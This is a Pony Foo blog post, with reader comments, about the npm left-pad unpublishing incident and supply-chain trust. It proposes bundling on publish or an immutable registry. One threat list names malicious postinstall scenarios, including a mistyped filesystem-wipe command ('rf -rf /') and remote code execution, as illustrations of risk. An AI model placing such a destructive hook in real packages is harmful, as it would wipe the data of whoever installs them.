ponyfoo.com

The npm Meltdown Uncovers Serious Security Risks

Fix
A relevant ad will be displayed here soon. These ads help pay for my hosting.
Please consider disabling your ad blocker on Pony Foo. These ads help pay for my hosting.
You can support Pony Foo directly through Patreon or via PayPal.

Earlier this week, as almost everyone reading this article knows, npm experienced a brief service interruption where npm install would fail for heaps of popular packages such as Babel and React Native, because somewhere deep in their dependency chains there was left-pad, a popular package that became unpublished. This event raises serious security concerns about how we’re handling dependencies in the JavaScript world.

For context, here’s a recap of the events leading up to the short-lived npm install issues earlier this week.

  • Azer published an open-source library as the kik package on npm
  • Kik wanted to use the kik package, and they approached Azer about it
  • Azer doesn’t want to give up the kik package name
  • Kik approaches npm through their conflict resolution policy about a solution
  • npm transfers ownership of kik to Kik
  • Azer retaliates by unpublishing all of his packages from npm
  • One of those packages, left-pad, was a popular dependency, underlying many other packages in the ecosystem
  • npm install started failing across the board for every package that has a dependency on left-pad@0.0.3
  • A third party published left-pad@1.0.0 with a copy of left-pad@0.0.3, but it didn’t help a lot
  • npm allowed that same third party to re-publish left-pad@0.0.3 as an exact copy of the unpublished package
  • Service was restored

From there, dozens of articles and tweets about the event were dispatched. Some questioned Kik’s claim to ownership of the kik package name. Some questioned Azer’s retaliation causing more damage to the community than to Kik. Some questioned npm for allowing a user to un-break the ecosystem by re-publishing an unpublished and fully open-source package. Some questioned npm for allowing users to npm unpublish in the first place. Some questioned npm for defending their interests over Azer’s and giving up ownership of kik.

The root cause of all of the above is, of course, trust. And it runs deep. In this article I want to go over the implications and hopefully trigger a constructive discussion around the topic.

Trust Issues

A few hours ago, a discussion started on npm/npm#12045 about whether we should trust npm. Trusting npm as a company is beside the point, though. A more important question is whether we can trust what people publish on npm.

Can we trust package authors?

There are about Infinity possible security risks posed by an npm package author “going rogue”, having his account compromised, or even making a mistake. Let’s enumerate a few scenarios where if "a package author decided to ${action}" would result in pain and suffering for the ecosystem as a whole.

  • Unpublish a popular module preventing their dependants, and their dependants’ dependants from ever being installed again unless npm chimed in
  • Include a postinstall script such as rf -rf /
  • Include a postinstall script such as npm unpublish
  • Include a postinstall script that allows for remote code execution
  • Publish a semver patch version containing a bug that makes the package unusable

Even if we make npm unpublish harder or even impossible, the community’s reliance on semver means that we would still be exposed to multiple other vulnerabilities, that may well fly under our radars, and that could be introduced at any point in time by a bad actor such as a rogue package author or someone taking over the account of a popular package holder.

The vast majority of npm users are benevolent, though. This is why semver mostly works.

Trusting package authors mostly works. Until it doesn’t.

Thus, we came up with techniques such as npm shrinkwrap or simply bundling your dependencies on npm publish so that we can trust a snapshot of what package authors produce, and not all of it. How is doing that any different than getting rid of semver, something that has been posited in the past without gaining much traction?

Again, semver mostly works, so we’re reluctant to not rely on it. There is value to semver, though.

The Fix: Bundling Before Publishing

Bundling on publish means we take advantage of our dependencies being semantically versioned during development, but that we won’t allow ourselves to publish a package that may mutate over time. At the same time, installs will be faster because we won’t be relying on npm to resolve a bunch of dependencies. This is basically what Rich argues in his Medium article, and partly what I’ve argued in my article about semver.

Does bundling on publish mean our dependants lose the ability to take advantage of semver?

No.

Semantic Versioning Can Still Help us During Development

Not allowing semantic versioning to leak through the entire dependency tree is the healthy approach to take here.

This is no different to Browserify having transforms run only at the local package level: the package author knows what transforms are best for their package, but they don’t really know their dependencies, or whether something will break at some point by running those transforms on a global scale. The author of dependencies can’t foresee every possible transform that’d be run against their code, so Browserify compromises on defaulting to local transforms. Semantic versioning is the same thing, but it’s lacking a sensible default.

Then there’s the issue of code duplication, but that’s a story for another day. I’ll take code duplication over fear of bringing services down any day. When it comes to front-end development, code duplication should be taken seriously, though, and npm is probably the best place where we can come up with a solution to that problem.

Immutability, Predictability, and a Possibly-Service-Provided Solution

Another take on fixing this issue would be having an immutable version of npm, let’s call it ipm. In this scenario, we’d keep semver for local development but there’d be a twist: anything ever published to ipm would remain on ipm forever. Unpublishing would only be possible through a DMCA process. At the time of publishing an example@version package, ipm would take care of computing all dependencies for example@version, respecting semver throughout the dependency graph, and bundling them together with the published example@version package. When example@version is installed, the exact same content would be downloaded every time. There wouldn’t be any need for package authors to take on the obnoxious task of bundling things together, because the ipm service would take care of that for them. The service should also be smart enough to bundle packages in such a way that code duplication is reduced to a minimum.

A service like ipm, when widely adopted by the community, would accomplish two things.

First, situations such as a package author unpublishing a popular module and causing ipm install to fail across the board would be avoided by preventing user-powered unpublishing entirely. If a DMCA notice or similar legal reason were to trigger the take-down of the doge package from the registry, then things that depended on doge would remain unaffected because doge was previously bundled into their dependants. Similarly, if a malicious user decided to introduce a postinstall vulnerability, it would only affect development environments and those who decide to update their doge dependency without verifying its integrity through one of those monitoring solutions which ensure packages on npm don’t go rogue.

Trusting others is the foundation of our community, but everyone can make mistakes and some can go rogue. We can’t rely on trust alone.

Second, and perhaps even most importantly, it’d introduce predictability, something we’ve been sorely missing lately in the grand scheme of all things web development. By staying immutable at the source, ipm would allow intermediary services such as Travis – as well as npm end users – to heavily cache those immutable packages that are known never to change. Even if development versions take full advantage of (one level deep) semver ranges, each package downloaded with ipm install would be a never-changing bundle. Installation time would also significantly go down, even when the bundles aren’t cached, ipm would have pre-computed all the necessary files for each dependency, no more tree-deep request-fests! 🌳

Predictability shouldn’t be as undervalued as it is today.

If anything, predictability speeds up our development and deployment processes. At its best, it prevents mistakes that stem from “lazy developers not bundling their code before deployment for every single package they create ever”. Of course, I disagree with the notion of lazy developers – that’s an oxymoron. But, as the lazy developers we strive to be, this problem should be resolved at the source, and not at the individual community contributor level. It’s far too important an issue for each individual to be expected to take responsibility. The service needs to step up.

Liked the article? Subscribe below to get an email when new articles come out! Also, follow @ponyfoo on Twitter and @ponyfoo on Facebook.
One-click unsubscribe, anytime. Learn more.

Comments (16)

Tim Whidden wrote

It seems that bundling Wiuld problematic for client side development where you need the flattest node_modules you can generate. For example, when you webpack your code for the browser, you wouldn’t want multiple versions of a dependency in the browser bundle.

Tim Whidden wrote

Typing this in my phone, sorry for the typo

*would be problematic

Yago Riveiro wrote

Trust is bidirectional relationship, As an author of a package can I trust NPM if with a series of emails from a company my packages is hijacked?

NPM should address the problem to the law, and don’t not take part in this like a judge. Tomorrow Facebook launch a new incredible service with the same name of my widely spread package and I literally f***, because NPM opened a nasty precedent.

A distribution package system should belong to the community not to a private company with private interest behind.

With this kind of issues (NPM and rogue authors), the only decent way to ensure we are not in the middle of a meltdown like this is hosting your dependencies by your own, is a pain in the ass but it’s safe.

P.S: There was a simple solution: kik-com, kik is already taken.

Peter Demling wrote

I’ve had what I think are two helpful reactions to this so far: gratitude, and fortitude.

First, gratitude to the thousands of people like Azer, who freely contribute their time and effort to open-source, letting me use the fruits of their creative efforts so that I don’t have to figure it all out myself. It’s standing on the shoulders of a host of benevolent giants, day after day, and I just assume it’s all going to work fine - and 99.9% of the time, it does. Azer and all open-source contributors (even the big agenda-driven companies) owe us nothing, and we have no basis for complaining when we have problems with the free stuff. Thankfully, most of what I’m hearing from the community echoes this sentiment. We need to remember this in the future, when companies try to bully their way into (npm) namespaces with increased frequency and power.

Second, fortitude in the build process: time for JS to embrace some more robust deploy practices, I think; or else be content with the exposed risk. We’re using open-source, people: if you depend on something outside your network to be there at deploy time, don’t be surprised if it’s not there! And if you do need to guarantee a reliable/robust build, then make sure have a (local) copy of all the code you need. This can be as simple as adding node_modules to your repo: http://stackoverflow.com/questions/18128863/should-node-modules-folder-be-included-in-the-git-repository .

Or don’t! The choice is up to you, and this level of insurance may not be worth the effort in your particular context. For example, in my experience with enterprise apps in other languages, it would be unthinkable to leave code dependencies unresolved until deploy time. But that’s the beauty of the open web, and the exponential rate at which this JS ecosystem is evolving: there’s probably not one way that we all need/should follow, and I think that’s okay: just make sure to follow your path with eyes wide open.

Carlos Vega wrote

I like this, it does sound like a possible solution however, I have one concern: how would the licenses of the bundled code affect my own code. If every package author uses permissive licenses like MIT everything should be fine, but what about the more restrictive ones? This would imply legal consequences to individuals and/or companies using these bundled packages.

Jess Telford wrote

shrinkpack provides a lot of the immutability of packages you are calling for, but without the overhead of having to trust another service.

The biggest downside with shrinkpack is your git history could potentially become very large.

Alpha wrote

In the case of ipm, there are a few things more to consider:

  1. An actual DMCA would affect all related packages, contrary to what you claim. A name conflict like the one Azer had would likely not, since a folder name somewhere would likely not be reachable by the extent of the law. However, if the concern is with the content of the code, then most likely the packet should be taken out in all of its copies of the server.

  2. ipm performing “shrinkwrapping” or freezing packaged would likely break npm’s ability to give you variations of dependencies. This has given my fair share of headaches too, but is indeed a feature that people may be using. (Are there? I actually stopped doing so, locking my versions to the specific ones I requested.)

Thisconnect wrote

Is it time for a distributed blockchain style npm?

Damian wrote

I’m curious, have there been any/many cases where npm packages have actually been compromised using the techniques, or similar, stated in this article?

A quick search online brings up a lot of articles warning about the potential but none (that I could see) about specific examples?

Nicolas Bevacqua wrote

The fact that anyone could perform these attacks with relative ease, plus the attack described in the CERT vulnerability disclosure, should be more than enough. Why wait until someone actually does any of this?

InternetBaby wrote

Having a private entity as single source of package is bad. The question of trust of the authors is irrelevant, since when a package is in the wild, it cannot disappear. The problem is packages do net get in the wild, they get on NPM, where they can disappear from. In the true spirit of open source we need an open, distributed and democratic or sharing and reusing code, like https://github.com/everythingstays/everythingstays

InternetBaby wrote

Having a private entity as single source of package is bad. The question of trust of the authors is irrelevant, since when a package is in the wild, it cannot disappear. The problem is packages do net get in the wild, they get on NPM, where they can disappear from. In the true spirit of open source we need an open, distributed and democratic or sharing and reusing code, like https://github.com/everythingstays/everythingstays

Brook Monroe wrote

After watching the debacle (and I’m not taking any side but my own), all I have to say is that WebAssembly can’t get here fast enough.

Nicolás Bevacqua wrote

WebAssembly doesn’t have anything to do with these issues, though. How do you expect it to fix any of this?

Michael van Olden wrote

To help thwart malicious code, some audit process would be wise. Npm could simply create a community audit system where any new version of a package would be placed on a temporary hold until a pre-determined number of ‘community auditors’ approve the code first. Once the code meets the approval threshold, it would be released for public consumption.

Additionally, every package accepted into public deployment should be archived with no expectation of a that public version ever being allowed to be reverted to private again.